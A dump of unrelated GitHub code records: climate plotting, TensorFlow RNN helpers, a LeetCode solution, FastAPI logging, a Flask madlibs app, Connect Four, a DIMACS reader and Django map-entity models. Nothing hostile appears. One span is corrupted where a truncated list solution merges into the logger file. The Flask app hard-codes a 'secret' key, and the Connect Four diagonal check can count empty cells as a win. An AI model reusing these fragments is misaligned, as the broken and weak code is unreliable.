results_climate_csv_85[\"Month\"].apply(lambda x: change_month(x))\n results_climate_csv_45[\"WYT_Season\"] = results_climate_csv_45[\"WYT_Month\"].apply(lambda x: change_season(x))\n results_climate_csv_85[\"WYT_Season\"] = results_climate_csv_85[\"WYT_Month\"].apply(lambda x: change_season(x))\n\n results_climate_csv_melt_45 = pd.melt(results_climate_csv_45,\n id_vars=[\"Date\", \"WY\", \"Month\", \"WYT_Month\", \"WYT_Season\"],\n value_vars=['CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5'],\n var_name=[\"Scen\"],\n value_name=\"Values\"\n )\n results_climate_csv_melt_85 = pd.melt(results_climate_csv_85,\n id_vars=[\"Date\", \"WY\", \"Month\", \"WYT_Month\", \"WYT_Season\"],\n value_vars=['CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5'],\n var_name=[\"Scen\"],\n value_name=\"Values\"\n )\n graph_data_45 = pd.concat([results_hist_csv_melt, results_climate_csv_melt_45])\n graph_data_85 = pd.concat([results_hist_csv_melt, results_climate_csv_melt_85])\n\n plt_color = [\"#505050\", \"#c1f215\", \"#00cdcd\", \"#ffa500\", \"#c6b6e0\"]\n sns.set(style=\"whitegrid\", rc={'figure.figsize': (20.7, 13.27)}, font_scale=2.0)\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n sns.boxplot(data=graph_data_45, x=\"WYT_Month\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_45, palette=plt_color)\n # plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xticks(np.arange(12), [\"Oct\", \"Nov\", \"Dec\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\"])\n plt.xlabel(\"Monthly\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxMonthly_45.png\")\n # plt.savefig(\"Figures/\" + file_name + \"_LineMonthly_45.png\")\n plt.clf()\n\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n sns.boxplot(data=graph_data_85, x=\"WYT_Month\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_85, palette=plt_color)\n # plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xticks(np.arange(12), [\"Oct\", \"Nov\", \"Dec\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\"])\n plt.xlabel(\"Monthly\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxMonthly_85.png\")\n # plt.savefig(\"Figures/\"+ file_name + \"_LineMonthly_85.png\")\n plt.clf()\n\n sns.boxplot(data=graph_data_45, x=\"WYT_Season\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_45, palette=plt_color)\n plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xlabel(\"Quarter\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxQuarter_45.png\")\n # plt.savefig(\"Figures/\" + file_name + \"_LineMonthly_45.png\")\n plt.clf()\n\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n sns.boxplot(data=graph_data_85, x=\"WYT_Season\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_85, palette=plt_color)\n plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xlabel(\"Quarter\")\n plt.ylabel(y_label)\n plt.ylim(y_lim_low, y_lim_high)\n plt.savefig(\"Figures/\" + file_name + \"_BoxQuarter_85.png\")\n # plt.savefig(\"Figures/\"+ file_name + \"_LineMonthly_85.png\")\n plt.clf()\n\nclimate_change_csv = generate_csv_climate()\nhistoric_csv = 
generate_csv_historic()\ngraph_files(climate_change_csv, historic_csv)","repo_name":"GateauXD/sierra-pywr","sub_path":"examples/Merced_Climate/generate_results.py","file_name":"generate_results.py","file_ext":"py","file_size_in_byte":14931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"13157849275","text":"import numpy as np\nimport tensorflow as tf\n\nfrom util.default_util import *\n\n__all__ = [\"create_embedding\", \"create_activation_function\", \"create_rnn_cell\", \"create_rnn_single_cell\"]\n\ndef create_embedding(vocab_size,\n embedding_dim,\n pretrained=False):\n \"\"\"create embedding with pre-trained embedding or initializer\"\"\"\n if pretrained is True:\n embedding = tf.get_variable(\"embedding\", shape=[vocab_size, embedding_dim], dtype=tf.float32,\n initializer=tf.zeros_initializer, trainable=False)\n embedding_placeholder = tf.placeholder(name=\"embedding_placeholder\",\n shape=[vocab_size, embedding_dim], dtype=tf.float32)\n embedding = embedding.assign(embedding_placeholder)\n else:\n embedding = tf.get_variable(\"embedding\", shape=[vocab_size, embedding_dim], dtype=tf.float32)\n embedding_placeholder = None\n \n return embedding, embedding_placeholder\n\ndef create_activation_function(activation):\n \"\"\"create activation function\"\"\"\n if activation == \"tanh\":\n activation_function = tf.nn.tanh\n elif activation == \"relu\":\n activation_function = tf.nn.relu\n elif activation == \"leaky_relu\":\n activation_function = tf.nn.leaky_relu\n elif activation == \"sigmoid\":\n activation_function = tf.nn.sigmoid\n else:\n activation_function = None\n \n return activation_function\n\ndef create_rnn_single_cell(unit_dim,\n unit_type,\n activation,\n forget_bias,\n residual_connect,\n drop_out,\n device_spec):\n \"\"\"create single rnn cell\"\"\"\n activation_function = create_activation_function(activation)\n \n if unit_type == \"lstm\":\n single_cell = tf.contrib.rnn.LSTMCell(num_units=unit_dim,\n use_peepholes=False, activation=activation_function, forget_bias=forget_bias)\n elif unit_type == \"peephole_lstm\":\n single_cell = tf.contrib.rnn.LSTMCell(num_units=unit_dim,\n use_peepholes=True, activation=activation_function, forget_bias=forget_bias)\n elif unit_type == \"layer_norm_lstm\":\n single_cell = tf.contrib.rnn.LayerNormBasicLSTMCell(num_units=unit_dim,\n layer_norm=True, activation=activation_function, forget_bias=forget_bias)\n elif unit_type == \"gru\":\n single_cell = tf.contrib.rnn.GRUCell(num_units=unit_dim, activation=activation_function)\n else:\n raise ValueError(\"unsupported unit type {0}\".format(unit_type))\n \n if drop_out > 0.0:\n single_cell = tf.contrib.rnn.DropoutWrapper(cell=single_cell, input_keep_prob=1.0-drop_out)\n \n if residual_connect == True:\n single_cell = tf.contrib.rnn.ResidualWrapper(cell=single_cell)\n \n if device_spec is not None:\n single_cell = tf.contrib.rnn.DeviceWrapper(cell=single_cell, device=device_spec)\n \n return single_cell\n\ndef create_rnn_cell(num_layer,\n unit_dim,\n unit_type,\n activation,\n forget_bias,\n residual_connect,\n drop_out,\n num_gpus,\n default_gpu_id):\n \"\"\"create rnn cell\"\"\"\n if num_layer > 1:\n cell_list = []\n for i in range(num_layer):\n single_cell = create_rnn_single_cell(unit_dim=unit_dim, unit_type=unit_type, activation=activation,\n forget_bias=forget_bias, residual_connect=residual_connect, drop_out=drop_out,\n device_spec=get_device_spec(default_gpu_id+i, num_gpus))\n cell_list.append(single_cell)\n cell = 
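The hydropower sums in generate_csv_climate and generate_csv_historic apply the standard relation P = efficiency * density * g * flow * head; the extra /3600 in the script is its own unit bookkeeping. The core term in isolation:

def hydropower_watts(flow_cms, head_m, efficiency=0.9):
    WATER_DENSITY = 1000.0  # kg/m^3
    GRAVITY = 9.81          # m/s^2
    return efficiency * WATER_DENSITY * GRAVITY * flow_cms * head_m

# 100 m^3/s through a 50 m head at 90% efficiency is about 44.1 MW.
print(hydropower_watts(100, 50) / 1e6)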
tf.contrib.rnn.MultiRNNCell(cell_list)\n else:\n cell = create_rnn_single_cell(unit_dim=unit_dim, unit_type=unit_type, activation=activation,\n forget_bias=forget_bias, residual_connect=residual_connect, drop_out=drop_out,\n device_spec=get_device_spec(default_gpu_id, num_gpus))\n \n return cell\n","repo_name":"stevezheng23/seq2seq_tf","sub_path":"seq2seq/util/seq2seq_util.py","file_name":"seq2seq_util.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"82"} +{"seq_id":"39743113982","text":"'''\nGiven a non-negative index k where k ≤ 33, return the kth index row of the Pascal's triangle.\n\nNote that the row index starts from 0.\n\n\nIn Pascal's triangle, each number is the sum of the two numbers directly above it.\n\nExample:\n\nInput: 3\nOutput: [1,3,3,1]\nFollow up:\n\nCould you optimize your algorithm to use only O(k) extra space?\n'''\n\nclass Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n fact = [1]\n for i in range(1,rowIndex+1):\n fact.append(i*fact[-1])\n \n ans = []\n for i in range(rowIndex+1):\n val = fact[rowIndex]//(fact[rowIndex-i]*fact[i])\n ans.append(val)\n \n return ans\n \n","repo_name":"shubhamkumar27/Leetcode_solutions","sub_path":"119. Pascal's Triangle II.py","file_name":"119. Pascal's Triangle II.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"31037004213","text":"def solution(bl, w, tw):\n tw.sort()\n answer = 0\n while len(tw)>0:\n a=tw.pop(0)\n print(a)\n if len(tw)==0:\n break\n if (a+tw[0]) logging.Logger:\n return logging.getLogger(settings.API_NAME)\n\n\ndef get_health_check_logger() -> logging.Logger:\n return logging.getLogger(settings.API_NAME + \"_health_check\")\n\n\n@cache\ndef setup_logger() -> None:\n default_logger = get_logger()\n health_check_logger = get_health_check_logger()\n\n if not settings.LOG_DIR.exists():\n default_logger.warning(\"make directory for logging at %s\", settings.LOG_DIR)\n settings.LOG_DIR.mkdir(parents=True, exist_ok=True)\n\n if settings.DEVELOP:\n default_logger.setLevel(logging.DEBUG)\n health_check_logger.setLevel(logging.DEBUG)\n else:\n default_logger.setLevel(logging.INFO)\n health_check_logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\"API:%(levelname)-7s[%(asctime)s] %(message)s\")\n formatter.converter = lambda _: datetime.now(tz=JST).timetuple()\n\n # file\n file_handler = TimedRotatingFileHandler(\n settings.LOG_DIR / \"request.log\",\n when=\"D\",\n interval=1,\n backupCount=31,\n )\n file_handler.setFormatter(formatter)\n default_logger.addHandler(file_handler)\n\n # stdout\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(formatter)\n default_logger.addHandler(stdout_handler)\n health_check_logger.addHandler(stdout_handler)\n\n # output for /health_check\n health_check_file_handler = logging.FileHandler(settings.LOG_DIR / \"health_check.log\")\n health_check_file_handler.setFormatter(formatter)\n health_check_logger.addHandler(health_check_file_handler)\n\n\ndef repr_client(client: list[str | int] | None) -> str:\n if not client:\n return \"\"\n address, port, *_ = client\n return f\"{address}:{port}\"\n\n\nasync def write_request_log(request: Request, call_next: CallNextType) -> Response:\n logger = get_logger() if request.scope[\"path\"] != \"/health_check\" else get_health_check_logger()\n\n logger.info(\n \"Request : %s - %s - %s\",\n 
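The factorial construction above already satisfies the docstring's O(k) space follow-up; the other classic answer is the in-place multiplicative recurrence C(k, j) = C(k, j-1) * (k - j + 1) / j, which avoids large factorials:

def get_row(k):
    row = [1] * (k + 1)
    for j in range(1, k + 1):
        # Exact integer arithmetic: C(k, j-1) * (k - j + 1) is divisible by j.
        row[j] = row[j - 1] * (k - j + 1) // j
    return row

assert get_row(3) == [1, 3, 3, 1]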
repr_client(request.scope.get(\"client\")),\n request.scope[\"method\"],\n request.scope[\"path\"],\n )\n\n start_time = time.time()\n response = await call_next(request)\n end_time = time.time()\n\n logger.info(\n \"Response: %s - %.4fs\",\n response.status_code,\n end_time - start_time,\n )\n\n return response\n","repo_name":"MasakiKobayashi0884/api_example_poe","sub_path":"api_example_poe/core/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11757650072","text":"from flask import Flask, render_template, request\nfrom flask_debugtoolbar import DebugToolbarExtension\n\nfrom stories import silly_story\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"secret\"\n\ndebug = DebugToolbarExtension(app)\n\n#populate the list of (verb/adjective/nouns)\n#loop over the list and fill in html element with each one\n# grab the data from user reponses, post route?\n# \nprompts = silly_story.prompts\n\n@app.get(\"/questions\")\ndef get_questions():\n \"\"\"Dynamically populates the questions.html with the prompts from a story instance \"\"\"\n return render_template(\"questions.html\", prompts=prompts)\n\n\n@app.get(\"/story\")\ndef make_story():\n \"\"\"Retrieves user inputed prompt answers from questions.html form and generates a story with the answers\"\"\"\n answers = request.args\n story = silly_story.generate(answers)\n return render_template(\"story.html\", story = story)\n #Question: why would you use render_template_string","repo_name":"ahlerliz/flask-madlibs","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"8360362995","text":"HEIGHT = 6\nWIDTH = 7\n\n\ndef four_cont_subarray(arr):\n count = 0\n for i in range(0, len(arr) - 1):\n if arr[i] == arr[i + 1] and arr[i] != \" \":\n count += 1\n if count + 1 >= 4:\n return arr[i]\n else:\n count = 0\n return False\n\n\ndef check_for_win(grid):\n cols = [[row[i] for row in grid] for i in range(WIDTH)]\n for row in grid:\n if four_cont_subarray(row) is not False:\n return four_cont_subarray(row)\n\n for col in cols:\n if four_cont_subarray(col) is not False:\n return four_cont_subarray(col)\n\n for row in range(HEIGHT - 3):\n for col in range(3, WIDTH):\n if (\n grid[row][col]\n == grid[row + 1][col - 1]\n == grid[row + 2][col - 2]\n == grid[row + 3][col - 3]\n and grid[row][col] != \" \"\n ):\n return grid[row][col]\n\n for row in range(HEIGHT - 3):\n for col in range(WIDTH - 3):\n if (\n grid[row][col]\n == grid[row + 1][col + 1]\n == grid[row + 2][col + 2]\n == grid[row + 3][col + 3]\n ):\n return grid[row][col]\n\n return False\n\n\ndef handle_turn(player):\n global current_turn\n print_grid(grid)\n col = int(input(f\"{current_turn}'s turn. Which column? 
From 1-{WIDTH} \")) - 1\n\n for i in range(HEIGHT - 1, -1, -1):\n if (grid[i][col]) == \" \":\n grid[i][col] = player\n break\n\n result = check_for_win(grid)\n if result == \"Y\":\n return \"Yellow wins\"\n elif result == \"R\":\n return \"Red wins\"\n elif result == \"DRAW\":\n return \"DRAW\"\n else:\n if current_turn == \"Y\":\n current_turn = \"R\"\n else:\n current_turn = \"Y\"\n\n\ndef print_grid(grid):\n print()\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n print(\"|\", end=\" \")\n print(grid[i][j], end=\" \")\n print(\"|\")\n print(\"-\" * 29)\n print(\" \", end=\"\")\n print(\" \".join([str(x) for x in range(1, WIDTH + 1)]))\n\n\ngrid = [[\" \" for _ in range(WIDTH)] for x in range(HEIGHT)]\ncurrent_turn = \"Y\"\nwhile True:\n result = handle_turn(current_turn)\n if result:\n print(result)\n print_grid(grid)\n break\n","repo_name":"joshuaspiral/connectfourpy","sub_path":"2player/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"29754920152","text":"import os\nimport glob as g\nimport shutil as sh\nfrom distutils.dir_util import copy_tree\n\nlod= g.glob('*')\nnow= os.getcwd()\n'''\nfor i in range(len(lod)):\n try:\n os.chdir(now+'/'+ lod[i] +'/Eyes/')\n lof= g.glob('*.jpg')\n for j in range(len(lof)):\n os.rename(lof[j], lof[j].split('.')[0]+'_'+lod[i]+'.jpg')\n os.chdir(now+'/'+ lod[i] +'/Nose/')\n lof= g.glob('*.jpg')\n for j in range(len(lof)):\n os.rename(lof[j], lof[j].split('.')[0]+'_'+lod[i]+'.jpg')\n os.chdir(now+'/'+ lod[i] +'/Lips/')\n lof= g.glob('*.jpg')\n for j in range(len(lof)):\n os.rename(lof[j], lof[j].split('.')[0]+'_'+lod[i]+'.jpg')\n os.chdir(now)\n except:\n print(\"haww\")\n''' \n\nos.mkdir('AllEyes')\nos.mkdir('AllNose')\nos.mkdir('AllLips')\n\nfor i in range(len(lod)):\n try:\n copy_tree(lod[i] +'/Eyes','AllEyes')\n copy_tree(lod[i] +'/Lips','AllLips')\n copy_tree(lod[i] +'/Nose','AllNose')\n except:\n print(\"haww\")\n \n \n","repo_name":"akshayjaryal603/Disguise_Face_Detection","sub_path":"copyAllParts.py","file_name":"copyAllParts.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"44871208274","text":"from pathlib import Path\n\nimport cupy\n\n\ndef transform_dimacs_clause_to_cugen_clause(dimacs_clause: str, number_of_literals: int) -> cupy.array:\n \"\"\"\n Transform a clause line from the DIMACS format to a clause in the cugen SAT format\n\n :param dimacs_clause: Line representing a clause in a DIMACS file\n :param number_of_literals: The number of literals in the formula\n :return: The clause in the cugen SAT format\n \"\"\"\n cugen_clause = cupy.array([cupy.nan] * number_of_literals)\n signed_literals = dimacs_clause.split()[:-1]\n\n for literal in signed_literals:\n literal_as_integer = int(literal)\n literal_as_index = int(cupy.absolute(literal_as_integer) - 1)\n\n if cupy.isnan(cugen_clause[literal_as_index]):\n cugen_clause[literal_as_index] = 0 if literal_as_integer < 0 else 1\n elif literal_as_integer != cugen_clause[literal_as_index]:\n cugen_clause[literal_as_index] = -2\n\n cugen_clause[cugen_clause == -2] = cupy.nan\n\n return cugen_clause\n\n\ndef read_dimacs_file(dimacs_file_path: Path) -> cupy.ndarray:\n \"\"\"\n Given a path to DIMACS CNF file, this function returns a formula in the cugen SAT format\n\n :param dimacs_file_path: The path to the DIMACS\n :return: The CNF formula in the 
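distutils.dir_util.copy_tree, used in copyAllParts.py above, disappeared with distutils in Python 3.12; shutil.copytree(..., dirs_exist_ok=True) (Python 3.8+) performs the same merge-copy and makes the bare os.mkdir calls and the blanket try/except unnecessary. A sketch of the equivalent loop:

import glob
import shutil

for part in ("Eyes", "Nose", "Lips"):
    for src in glob.glob(f"*/{part}"):
        # dirs_exist_ok merges every person's folder into All{part}.
        shutil.copytree(src, f"All{part}", dirs_exist_ok=True)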
cugen SAT format\n \"\"\"\n with dimacs_file_path.open() as dimacs_file:\n line = dimacs_file.readline()\n while line[0] == 'c':\n line = dimacs_file.readline()\n\n number_of_literals = int(line.split()[2])\n\n clauses = []\n for line in dimacs_file.readlines():\n if line[0] == 'c':\n continue\n if line[0] == '%':\n return cupy.array(clauses)\n clauses.append(transform_dimacs_clause_to_cugen_clause(line, number_of_literals))\n\n return cupy.array(clauses)\n","repo_name":"SamyAB/cugen","sub_path":"cugen/sat_problem_modelling/dimacs_reader.py","file_name":"dimacs_reader.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"19734979403","text":"import os\nimport math\n\nfrom django.db import models\nfrom django.db.utils import OperationalError\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import FieldError, ObjectDoesNotExist\nfrom django.core.urlresolvers import NoReverseMatch\nfrom django.contrib import auth\nfrom django.contrib.admin.models import LogEntry as BaseLogEntry\nfrom django.contrib.admin.models import ADDITION, CHANGE, DELETION\nfrom django.utils.formats import localize\nfrom django.utils.timezone import utc\nfrom django.utils.translation import ugettext_lazy as _\nfrom paperclip.models import Attachment\nfrom rest_framework import permissions as rest_permissions\n\nfrom mapentity.templatetags.mapentity_tags import humanize_timesince\nfrom .settings import app_settings, API_SRID\nfrom .helpers import smart_urljoin, is_file_newer, capture_map_image, extract_attributes_html\n\n\n# Used to create the matching url name\nENTITY_LAYER = \"layer\"\nENTITY_LIST = \"list\"\nENTITY_JSON_LIST = \"json_list\"\nENTITY_FORMAT_LIST = \"format_list\"\nENTITY_DETAIL = \"detail\"\nENTITY_MAPIMAGE = \"mapimage\"\nENTITY_DOCUMENT = \"document\"\nENTITY_CREATE = \"add\"\nENTITY_UPDATE = \"update\"\nENTITY_DELETE = \"delete\"\n\nENTITY_KINDS = (\n ENTITY_LAYER, ENTITY_LIST, ENTITY_JSON_LIST,\n ENTITY_FORMAT_LIST, ENTITY_DETAIL, ENTITY_MAPIMAGE, ENTITY_DOCUMENT, ENTITY_CREATE,\n ENTITY_UPDATE, ENTITY_DELETE\n)\n\nENTITY_PERMISSION_CREATE = 'add'\nENTITY_PERMISSION_READ = 'read'\nENTITY_PERMISSION_UPDATE = 'change'\nENTITY_PERMISSION_DELETE = 'delete'\nENTITY_PERMISSION_EXPORT = 'export'\n\nENTITY_PERMISSIONS = (\n ENTITY_PERMISSION_CREATE,\n ENTITY_PERMISSION_READ,\n ENTITY_PERMISSION_UPDATE,\n ENTITY_PERMISSION_DELETE,\n ENTITY_PERMISSION_EXPORT\n)\n\n\nclass MapEntityRestPermissions(rest_permissions.DjangoModelPermissions):\n perms_map = {\n 'GET': ['%(app_label)s.read_%(model_name)s'],\n 'OPTIONS': ['%(app_label)s.read_%(model_name)s'],\n 'HEAD': ['%(app_label)s.read_%(model_name)s'],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_%(model_name)s'],\n }\n\n\nclass MapEntityMixin(object):\n\n _entity = None\n capture_map_image_waitfor = '.leaflet-tile-loaded'\n\n @classmethod\n def get_create_label(cls):\n name = cls._meta.verbose_name\n if hasattr(name, '_proxy____args'):\n name = name._proxy____args[0] # untranslated\n # Whole \"add\" phrase translatable, but not catched by makemessages\n return _(u\"Add a new %s\" % name.lower())\n\n @classmethod\n def get_entity_kind_permission(cls, entity_kind):\n operations = {\n ENTITY_CREATE: ENTITY_PERMISSION_CREATE,\n ENTITY_UPDATE: 
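A worked example of the clause encoding above, assuming the dimacs_reader module is importable and a CUDA device is available for cupy: with 4 literals, the DIMACS clause "1 -3 0" sets index 0 to 1 (positive literal), index 2 to 0 (negated literal), and leaves the unused positions NaN.

from cugen.sat_problem_modelling.dimacs_reader import (
    transform_dimacs_clause_to_cugen_clause,
)

clause = transform_dimacs_clause_to_cugen_clause("1 -3 0", 4)
print(clause)  # [ 1. nan  0. nan]
# A literal present with both signs (e.g. "2 -2 0") is first flagged -2 and
# then reset to NaN, so tautological literals drop out of the clause.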
ENTITY_PERMISSION_UPDATE,\n ENTITY_DELETE: ENTITY_PERMISSION_DELETE,\n\n ENTITY_DETAIL: ENTITY_PERMISSION_READ,\n ENTITY_LAYER: ENTITY_PERMISSION_READ,\n ENTITY_LIST: ENTITY_PERMISSION_READ,\n ENTITY_JSON_LIST: ENTITY_PERMISSION_READ,\n\n ENTITY_FORMAT_LIST: ENTITY_PERMISSION_EXPORT,\n ENTITY_MAPIMAGE: ENTITY_PERMISSION_EXPORT,\n ENTITY_DOCUMENT: ENTITY_PERMISSION_EXPORT,\n }\n perm = operations.get(entity_kind, entity_kind)\n assert perm in ENTITY_PERMISSIONS\n return perm\n\n @classmethod\n def get_permission_codename(cls, entity_kind):\n perm = cls.get_entity_kind_permission(entity_kind)\n opts = cls._meta\n appname = opts.app_label.lower()\n if opts.proxy:\n proxied = opts.proxy_for_model._meta\n appname = proxied.app_label.lower()\n return '%s.%s' % (appname, auth.get_permission_codename(perm, opts))\n\n @classmethod\n def latest_updated(cls):\n try:\n fname = app_settings['DATE_UPDATE_FIELD_NAME']\n return cls.objects.latest(fname).get_date_update()\n except (cls.DoesNotExist, FieldError):\n return None\n\n def get_date_update(self):\n try:\n fname = app_settings['DATE_UPDATE_FIELD_NAME']\n return getattr(self, fname).replace(tzinfo=utc)\n except AttributeError:\n return None\n\n def get_geom(self):\n \"\"\" Get main geometry field.\n \"\"\"\n return getattr(self, app_settings['GEOM_FIELD_NAME'], None)\n\n def delete(self, *args, **kwargs):\n # Delete map image capture when delete object\n image_path = self.get_map_image_path()\n if os.path.exists(image_path):\n os.unlink(image_path)\n super(MapEntityMixin, self).delete(*args, **kwargs)\n\n @classmethod\n @models.permalink\n def get_layer_url(cls):\n return (cls._entity.url_name(ENTITY_LAYER), )\n\n @classmethod\n @models.permalink\n def get_list_url(cls):\n return (cls._entity.url_name(ENTITY_LIST), )\n\n @classmethod\n @models.permalink\n def get_jsonlist_url(cls):\n return (cls._entity.url_name(ENTITY_JSON_LIST), )\n\n @classmethod\n @models.permalink\n def get_format_list_url(cls):\n return (cls._entity.url_name(ENTITY_FORMAT_LIST), )\n\n @classmethod\n @models.permalink\n def get_add_url(cls):\n return (cls._entity.url_name(ENTITY_CREATE), )\n\n def get_absolute_url(self):\n return self.get_detail_url()\n\n @classmethod\n @models.permalink\n def get_generic_detail_url(cls):\n return (cls._entity.url_name(ENTITY_DETAIL), [str(0)])\n\n @models.permalink\n def get_detail_url(self):\n return (self._entity.url_name(ENTITY_DETAIL), [str(self.pk)])\n\n @property\n def map_image_url(self):\n return self.get_map_image_url()\n\n @models.permalink\n def get_map_image_url(self):\n return (self._entity.url_name(ENTITY_MAPIMAGE), [str(self.pk)])\n\n @models.permalink\n def get_document_url(self):\n return (self._entity.url_name(ENTITY_DOCUMENT), [str(self.pk)])\n\n @models.permalink\n def get_update_url(self):\n return (self._entity.url_name(ENTITY_UPDATE), [str(self.pk)])\n\n @models.permalink\n def get_delete_url(self):\n return (self._entity.url_name(ENTITY_DELETE), [str(self.pk)])\n\n @property\n def attachments(self):\n return Attachment.objects.attachments_for_object(self)\n\n def get_map_image_extent(self, srid=API_SRID):\n fieldname = app_settings['GEOM_FIELD_NAME']\n obj = getattr(self, fieldname)\n obj.transform(srid)\n return obj.extent\n\n def prepare_map_image(self, rooturl):\n if self.get_geom() is None:\n return True\n path = self.get_map_image_path()\n # Do nothing if image is up-to-date\n if is_file_newer(path, self.get_date_update()):\n return False\n url = smart_urljoin(rooturl, self.get_detail_url())\n extent = 
self.get_map_image_extent(3857)\n length = max(extent[2] - extent[0], extent[3] - extent[1])\n if length:\n hint_size = app_settings['MAP_CAPTURE_SIZE']\n length_per_tile = 256 * length / hint_size\n RADIUS = 6378137\n CIRCUM = 2 * math.pi * RADIUS\n zoom = round(math.log(CIRCUM / length_per_tile, 2))\n size = math.ceil(length * 1.1 * 256 * 2 ** zoom / CIRCUM)\n else:\n size = app_settings['MAP_CAPTURE_SIZE']\n capture_map_image(url, path, size=size, waitfor=self.capture_map_image_waitfor)\n return True\n\n def get_map_image_path(self):\n basefolder = os.path.join(settings.MEDIA_ROOT, 'maps')\n if not os.path.exists(basefolder):\n os.makedirs(basefolder)\n return os.path.join(basefolder, '%s-%s.png' % (self._meta.module_name, self.pk))\n\n def get_attributes_html(self, request):\n return extract_attributes_html(self.get_detail_url(), request)\n\n @classmethod\n def get_content_type_id(cls):\n try:\n return ContentType.objects.get_for_model(cls).pk\n except OperationalError: # table is not yet created\n return None\n\n @property\n def creator(self):\n log_entry = LogEntry.objects.filter(\n content_type_id=self.get_content_type_id(),\n object_id=self.pk,\n action_flag=ADDITION).order_by('pk').last()\n return log_entry and log_entry.user\n\n @property\n def authors(self):\n return auth.get_user_model().objects.filter(\n logentry__content_type_id=self.get_content_type_id(),\n logentry__object_id=self.pk).distinct()\n\n @property\n def last_author(self):\n return self.authors.order_by('logentry__pk').last()\n\n def is_public(self):\n \"Override this method to allow unauthenticated access to attachments\"\n return False\n\n\nclass LogEntry(MapEntityMixin, BaseLogEntry):\n geom = None\n object_verbose_name = _(\"object\")\n\n class Meta:\n proxy = True\n\n @property\n def action_flag_display(self):\n return {\n ADDITION: _(\"Added\"),\n CHANGE: _(\"Changed\"),\n DELETION: _(\"Deleted\"),\n }[self.action_flag]\n\n @property\n def action_time_display(self):\n return u'{0} ({1})'.format(localize(self.action_time),\n humanize_timesince(self.action_time))\n\n @property\n def object_display(self):\n model_str = unicode(self.content_type)\n try:\n obj = self.get_edited_object()\n assert obj._entity, 'Unregistered model %s' % model_str\n obj_url = obj.get_detail_url()\n except (ObjectDoesNotExist, NoReverseMatch, AssertionError):\n return u'%s %s' % (model_str, self.object_repr)\n else:\n return u'%s %s' % (\n obj.pk, obj_url, model_str, self.object_repr)\n","repo_name":"TheoLechemia/mapentity-project","sub_path":"mapentity/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"73582703237","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport math\nimport csv\nimport random\n\ntime = 0.1\n\ndpi = 50\nfig = plt.figure(dpi = dpi, figsize = (640 / dpi, 360 / dpi))\n\nplt.axis([0, time , -1, 1])\n\nplt.title('Шум')\nplt.xlabel('t, с')\nplt.ylabel('U, В')\n\nxs = []\nnoise_list = []\n\nx = 0.0\n\ncsvdata = [[]]\nwhile x <= time :\n noise = random.uniform(-1, 1)\n noise_list.append(noise)\n csvdata.append([x, noise])\n xs += [x]\n x += math.pow(100000, -1)\n\ndiscretePoints = open('report/noise.csv', 'w')\nwith discretePoints:\n writer = csv.writer(discretePoints)\n writer.writerows(csvdata)\n\nplt.plot(xs, noise_list, '.', label = 'Шум')\nfig.savefig('report/noise_full.png')\nplt.axis([0.05, 0.055, -1, 